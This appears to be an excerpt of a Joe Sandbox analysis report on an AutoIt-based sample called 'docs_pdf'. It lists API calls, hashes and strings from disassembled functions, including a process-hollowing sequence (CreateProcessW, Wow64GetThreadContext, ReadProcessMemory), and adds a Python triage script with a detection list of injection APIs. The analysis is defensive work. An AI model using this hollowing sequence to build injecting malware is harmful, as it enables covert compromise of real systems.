                                    • Opcode ID: fce55cc577202ec5d72cd5d19c0ec91c170aa01157ca6f780195e54e5a957014
                                    • Instruction ID: 2aeae244c88e7edbc6e866b7ea728de482b012bfcfa5c28c86382707a6304174
                                    • Opcode Fuzzy Hash: fce55cc577202ec5d72cd5d19c0ec91c170aa01157ca6f780195e54e5a957014
                                    • Instruction Fuzzy Hash: 6B4129B2E44906ABEB245F26DC09FF93759F700310F240119F983D6296CE6BAD10BF62

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                    • API String ID: 1825951767-3513169116
                                    • Opcode ID: 16cdeed9b1406ed1a439dd457aaea8f681556aefb9458150eaab90e5bb311467
                                    • Instruction ID: 55935d4dfbcc86e87d362b797b78816e468a3709e315b8d57c964aacc3aa6a70
                                    • Opcode Fuzzy Hash: 16cdeed9b1406ed1a439dd457aaea8f681556aefb9458150eaab90e5bb311467
                                    • Instruction Fuzzy Hash: 04A16072C146299ADB04FFA2CC91AEEB77DBF54300F04042AE452B7181DF799A09EF61

                                    Control-flow Graph

                                    • Function entry 00F825E0. The rendered graph is not reproduced here; its blocks mark call sites for CreateFileW, VirtualAlloc (two sites), ReadFile, FindCloseChangeNotification and VirtualFree (two sites). Only CreateFileW and VirtualFree appear in the APIs list below.
                                    APIs
                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00F826B1
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F828D7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673274915.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f80000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CreateFileFreeVirtual
                                    • String ID:
                                    • API String ID: 204039940-0
                                    • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                    • Instruction ID: e6ec8680761e95e659f0e6dcef07dee81a0f748c2ad58a7f315a22c4701be83b
                                    • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                    • Instruction Fuzzy Hash: 63A10574E00209EBDF54DFA4C994BEEBBB5BF48314F208159E501BB280D779AA81DF94

                                    Control-flow Graph

                                    • Function entry 00FB39E7, a single basic block that calls CreateWindowExW twice and ShowWindow twice (rendered graph not reproduced here).
                                    APIs
                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FB3A15
                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FB3A36
                                    • ShowWindow.USER32(00000000,?,?), ref: 00FB3A4A
                                    • ShowWindow.USER32(00000000,?,?), ref: 00FB3A53
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$CreateShow
                                    • String ID: AutoIt v3$edit
                                    • API String ID: 1584632944-3779509399
                                    • Opcode ID: 999d457dc9175707260dc1722d764d24290b2a89d6a8c789d417907f9b9cda86
                                    • Instruction ID: cd218283b908f8d2a6d6ef0effbf1620ce468298ee242e28963e30963cc99495
                                    • Opcode Fuzzy Hash: 999d457dc9175707260dc1722d764d24290b2a89d6a8c789d417907f9b9cda86
                                    • Instruction Fuzzy Hash: 8CF03A70E00A907EFA711663AC09E272E7DE7C6F50B00401EBA41F2264C6AB0802DBB1

                                    Control-flow Graph

                                    • Function entry 00F823B0. The rendered graph is not reproduced here; its blocks mark call sites for CreateFileW, VirtualAlloc, ReadFile and ExitProcess plus internal calls. Only CreateFileW (and the Sleep subcall) appears in the APIs list below.
                                    APIs
                                      • Part of subcall function 00F822A0: Sleep.KERNELBASE(000001F4), ref: 00F822B1
                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00F824CA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673274915.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f80000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CreateFileSleep
                                    • String ID: JBBI7A9KWERFPGMX2WUKC
                                    • API String ID: 2694422964-1034247826
                                    • Opcode ID: b64c8992c39bf7294d7b722e2f18f414a852a12c420bce021adb3e11384fd799
                                    • Instruction ID: 0f70daa81231aadc8d8974f4bb61526be91c9083ec974e545917d60c48c72fea
                                    • Opcode Fuzzy Hash: b64c8992c39bf7294d7b722e2f18f414a852a12c420bce021adb3e11384fd799
                                    • Instruction Fuzzy Hash: 7051B070D04249DAEF11DBA4C859BEFBBB8AF15300F144199E608BB2C1D6B91B44DBA5

                                    Control-flow Graph

                                    • Function entry 00FD564D. The rendered graph is not reproduced here; it contains internal calls only, with no API call sites.
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                    • String ID:
                                    • API String ID: 1559183368-0
                                    • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                    • Instruction ID: f721b242ceea01cbe5225976beeb2c1c7c3c0cabc7b97f356c75ad8b3db46e3d
                                    • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                    • Instruction Fuzzy Hash: D5519131E00B09DBDB249F69888466E7BA3AF40B70F3C872BE825963D0D774DD51AB40

                                    Control-flow Graph

                                    • Function entry 00FB69CA. The rendered graph is not reproduced here; it contains internal and CRT calls only. The LoadLibraryExW and SetCurrentDirectoryW entries below come from subcalls.
                                    APIs
                                      • Part of subcall function 00FB4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,010762F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FB4F6F
                                    • _free.LIBCMT ref: 00FEE68C
                                    • _free.LIBCMT ref: 00FEE6D3
                                      • Part of subcall function 00FB6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FB6D0D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                    • API String ID: 2861923089-1757145024
                                    • Opcode ID: 4bada6c5fc1b6f67a6a9cc1bb2a28a4f3fd42d1c88d96120a7c1a52895a4335b
                                    • Instruction ID: 54825d6d77ec49d64d1d294cd309f86146154157c428482d57722f555b78c447
                                    • Opcode Fuzzy Hash: 4bada6c5fc1b6f67a6a9cc1bb2a28a4f3fd42d1c88d96120a7c1a52895a4335b
                                    • Instruction Fuzzy Hash: 14917071910259EFCF04EFA6DC919EDB7B8FF18310F14446AE815AB2A1DB38A904EF50
                                    APIs
                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00FB35A1,SwapMouseButtons,00000004,?), ref: 00FB35D4
                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00FB35A1,SwapMouseButtons,00000004,?,?,?,?,00FB2754), ref: 00FB35F5
                                    • RegCloseKey.KERNELBASE(00000000,?,?,00FB35A1,SwapMouseButtons,00000004,?,?,?,?,00FB2754), ref: 00FB3617
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: Control Panel\Mouse
                                    • API String ID: 3677997916-824357125
                                    • Opcode ID: 9a835222e6241222ad2a4eed7f0b69426e8b7342db70bd3b4c9de509b7aa3867
                                    • Instruction ID: b42b82d67974d81e152ac2626bc02fbad9c921aed13ac28652f8df1853747a7c
                                    • Opcode Fuzzy Hash: 9a835222e6241222ad2a4eed7f0b69426e8b7342db70bd3b4c9de509b7aa3867
                                    • Instruction Fuzzy Hash: EA115AB5950208BFDB209F69DC84EEEB7BDEF04750F005459F805D7210D2719F40AB60
                                    APIs
                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00F81A5B
                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F81AF1
                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F81B13
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673274915.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f80000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                    • String ID:
                                    • API String ID: 2438371351-0
                                    • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                    • Instruction ID: 9e797271919d33981f329c631c7e33a23096da5240c8e24e04ba5a05667e1b7a
                                    • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                    • Instruction Fuzzy Hash: 1D621830A14258DBEB24DFA4C840BDEB376FF58700F1091A9D10DEB290E77A9E81DB59
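Two things an analyst reads out of records like the ones above are worth making mechanical: how the Similarity "API ID" is built from a record's APIs list (so functions can be matched across reports without relying on the fuzzy hashes), and how a record whose source is marked "based on PE: false" and which strings CreateProcessW, Wow64GetThreadContext and ReadProcessMemory together should be ranked for review. The Python below is an added example, not Joe Sandbox code: the camel-case split, the stop-word set and the count-then-ASCII ordering are inferred from the ID values printed on this page and are assumptions; the extra API names in STAGES (WriteProcessMemory, SetThreadContext and so on) are the usual members of the RunPE sequence added from general knowledge, not from this report; the embedded sample lines are excerpts of records on this page.

```python
"""Re-derive the Similarity "API ID" of a function record and triage records
whose code is not backed by a PE image.  Added example, not Joe Sandbox code:
token, stop-word and ordering rules are inferred from this page (assumption);
sample lines are excerpts of records on this page."""
import re
from collections import Counter

# One "APIs" bullet, with or without a "Part of subcall function" prefix and
# with or without an argument list (compare "_wcscat.LIBCMT ref: 00FEEDC9").
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)

def parse_apis(text):
    """Return one dict (name, module, args, ref) per API bullet in text."""
    out = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] is not None else []
            out.append({"name": m["name"], "module": m["module"],
                        "args": args, "ref": m["ref"]})
    return out

# Prefix/suffix tokens that never reach the IDs on this page (inferred list).
STOP = {"Get", "Set", "Reg", "Rtl", "Sys", "Def", "Key", "Ex", "W"}
CAMEL = re.compile(r"[A-Z][a-z0-9_]*")   # ImageList_Create -> Image, List_, Create

def tokens(name):
    if name.startswith("_"):             # CRT names (_free, __wcsicmp_l) stay whole
        return [name]
    return [t for t in CAMEL.findall(name) if t not in STOP]

def api_id(text):
    """Tokens grouped by descending call count (subcall bullets count too),
    ASCII-sorted within a group, groups joined with '$'."""
    counts = Counter(t for rec in parse_apis(text) for t in tokens(rec["name"]))
    by_count = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n]))
                    for n in sorted(by_count, reverse=True))

# Stages of the RunPE / process-hollowing sequence.  The first name in each
# set is on this page; the others are the usual siblings (added here).
STAGES = {
    "spawn":   {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},
    "context": {"Wow64GetThreadContext", "GetThreadContext",
                "Wow64SetThreadContext", "SetThreadContext"},
    "memory":  {"ReadProcessMemory", "WriteProcessMemory",
                "NtUnmapViewOfSection", "VirtualAllocEx"},
}

def triage(record):
    """Rank a record for review: unbacked code ("based on PE: false") that
    touches every stage is a hollowing candidate.  The report's signatures,
    not this heuristic, are the verdict."""
    names = {r["name"] for r in parse_apis(record["apis"])}
    stages = sorted(s for s, apis in STAGES.items() if names & apis)
    unbacked = "based on PE: false" in record["source"]
    return {"stages": stages, "unbacked": unbacked,
            "hollowing_candidate": unbacked and len(stages) == len(STAGES)}

# Excerpts of three records from this report (source line and APIs bullets).
UNBACKED = ("00000000.00000002.1673274915.0000000000F80000.00000040.00001000."
            "00020000.00000000.sdmp, Offset: 00F80000, based on PE: false")
INCLUDE_PATH_APIS = r"""
  • Part of subcall function 00FB4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,010762F8,?,00FB37C0,?), ref: 00FB4882
  • Part of subcall function 00FD074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00FB72C5), ref: 00FD0771
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00FB7308
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00FEECF1
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00FEED32
• RegCloseKey.ADVAPI32(?), ref: 00FEED70
• _wcscat.LIBCMT ref: 00FEEDC9
"""
HOLLOW = {"source": UNBACKED, "apis": """
• CreateProcessW.KERNELBASE(?,00000000), ref: 00F81A5B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F81AF1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F81B13
"""}
FILE_READ = {"source": UNBACKED, "apis": """
• CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00F826B1
• VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F828D7
"""}

if __name__ == "__main__":
    print(api_id(INCLUDE_PATH_APIS))   # NameQueryValue$CloseFileFullModuleOpenPath_wcscat
    for rec in (HOLLOW, FILE_READ):
        print(api_id(rec["apis"]), triage(rec))
```

On the three embedded records the derivation reproduces the IDs printed on this page (NameQueryValue$CloseFileFullModuleOpenPath_wcscat, Process$ContextCreateMemoryReadThreadWow64, CreateFileFreeVirtual) and the triage flags only the CreateProcessW record. Treat the stop-word set as provisional: a record whose recomputed ID disagrees with the report's value is the signal that another prefix or suffix belongs in STOP. The heuristic only orders records for a human to read; the report's own signatures (thread-context modification, writes to foreign memory) remain the verdict.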
                                    APIs
                                      • Part of subcall function 00FB5045: _fseek.LIBCMT ref: 00FB505D
                                      • Part of subcall function 010199BE: _wcscmp.LIBCMT ref: 01019AAE
                                      • Part of subcall function 010199BE: _wcscmp.LIBCMT ref: 01019AC1
                                    • _free.LIBCMT ref: 0101992C
                                    • _free.LIBCMT ref: 01019933
                                    • _free.LIBCMT ref: 0101999E
                                      • Part of subcall function 00FD2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00FD9C64), ref: 00FD2FA9
                                      • Part of subcall function 00FD2F95: GetLastError.KERNEL32(00000000,?,00FD9C64), ref: 00FD2FBB
                                    • _free.LIBCMT ref: 010199A6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                    • String ID:
                                    • API String ID: 1552873950-0
                                    • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                    • Instruction ID: 6f6c57dc8d2f81618765d3df58347b249f6bdfbc1a0a17cb4df9472225f20c97
                                    • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                    • Instruction Fuzzy Hash: 735171B1D04219AFDF249F65CC40ADEBBBAEF48304F04049EB649A7241DB395A80CF58
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                    • String ID:
                                    • API String ID: 2782032738-0
                                    • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                    • Instruction ID: a12b4d96264eebf1ae32bbf544b50395127d4d96c4a3c6137d9f675725e73c11
                                    • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                    • Instruction Fuzzy Hash: 2A41D671A006069BDF18CFAAC89096F77A7EF80360B2C813FE855C7740D774AD40AB45
                                    APIs
                                    • _memset.LIBCMT ref: 00FEEE62
                                    • GetOpenFileNameW.COMDLG32(?), ref: 00FEEEAC
                                      • Part of subcall function 00FB48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FB48A1,?,?,00FB37C0,?), ref: 00FB48CE
                                      • Part of subcall function 00FD09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FD09F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Name$Path$FileFullLongOpen_memset
                                    • String ID: X
                                    • API String ID: 3777226403-3081909835
                                    • Opcode ID: 36c087876595c5e888e2ed17655a07d6e5171d6a257b3d0385da9769b14309bf
                                    • Instruction ID: 424705da6f15eac25e8ff1800b5a02cd0c3165d4d0a6fa2b7dd42728c34d88be
                                    • Opcode Fuzzy Hash: 36c087876595c5e888e2ed17655a07d6e5171d6a257b3d0385da9769b14309bf
                                    • Instruction Fuzzy Hash: 0F21C371E002989BCB15EF95CC45BEE7BFD9F49314F04801AE408E7281DBB859899FA1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: __fread_nolock_memmove
                                    • String ID: EA06
                                    • API String ID: 1988441806-3962188686
                                    • Opcode ID: f26499913e42db5ebeb22ed7826db49eef33bde3db6531be0ca341bb002d255c
                                    • Instruction ID: 08576c0e2acb5d08031e5510dd150c1681f2a241252f39ea8fe90a2a75409db3
                                    • Opcode Fuzzy Hash: f26499913e42db5ebeb22ed7826db49eef33bde3db6531be0ca341bb002d255c
                                    • Instruction Fuzzy Hash: 5D01F972904258BEDB29D7A8CC16EFEBBFC9B01201F04419FF592D2281E579A604DB60
                                    APIs
                                    • GetTempPathW.KERNEL32(00000104,?), ref: 01019B82
                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 01019B99
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Temp$FileNamePath
                                    • String ID: aut
                                    • API String ID: 3285503233-3010740371
                                    • Opcode ID: 9a84c48db8aed5089ac9cf1b33b59b40403875e01dd6fa916da07346e5aa59bb
                                    • Instruction ID: 6da53c9ecf4a24e18e399fd63bc20d2b08ee498117527b473eeac722ddfc8213
                                    • Opcode Fuzzy Hash: 9a84c48db8aed5089ac9cf1b33b59b40403875e01dd6fa916da07346e5aa59bb
                                    • Instruction Fuzzy Hash: 04D05E7994030EEBDB20AA90DC0EF9AB72CE744700F0042A1BE9496091DEB555988B92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: be643edb670c4a5e166878fd7caf233d884c8b6b8b83d94ce37a4247d0782d13
                                    • Instruction ID: 56ab59e02820b244cd9fdc66ce8cce658132f8ad42f3841318f599e751bab570
                                    • Opcode Fuzzy Hash: be643edb670c4a5e166878fd7caf233d884c8b6b8b83d94ce37a4247d0782d13
                                    • Instruction Fuzzy Hash: 35F16670A083119FCB10DF68C880A6ABBE5FF89314F14896EF8999B351D775E945CF82
                                    APIs
                                      • Part of subcall function 00FD03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FD03D3
                                      • Part of subcall function 00FD03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FD03DB
                                      • Part of subcall function 00FD03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FD03E6
                                      • Part of subcall function 00FD03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FD03F1
                                      • Part of subcall function 00FD03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FD03F9
                                      • Part of subcall function 00FD03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FD0401
                                      • Part of subcall function 00FC6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00FBFA90), ref: 00FC62B4
                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00FBFB2D
                                    • OleInitialize.OLE32(00000000), ref: 00FBFBAA
                                    • CloseHandle.KERNEL32(00000000), ref: 00FF49F2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
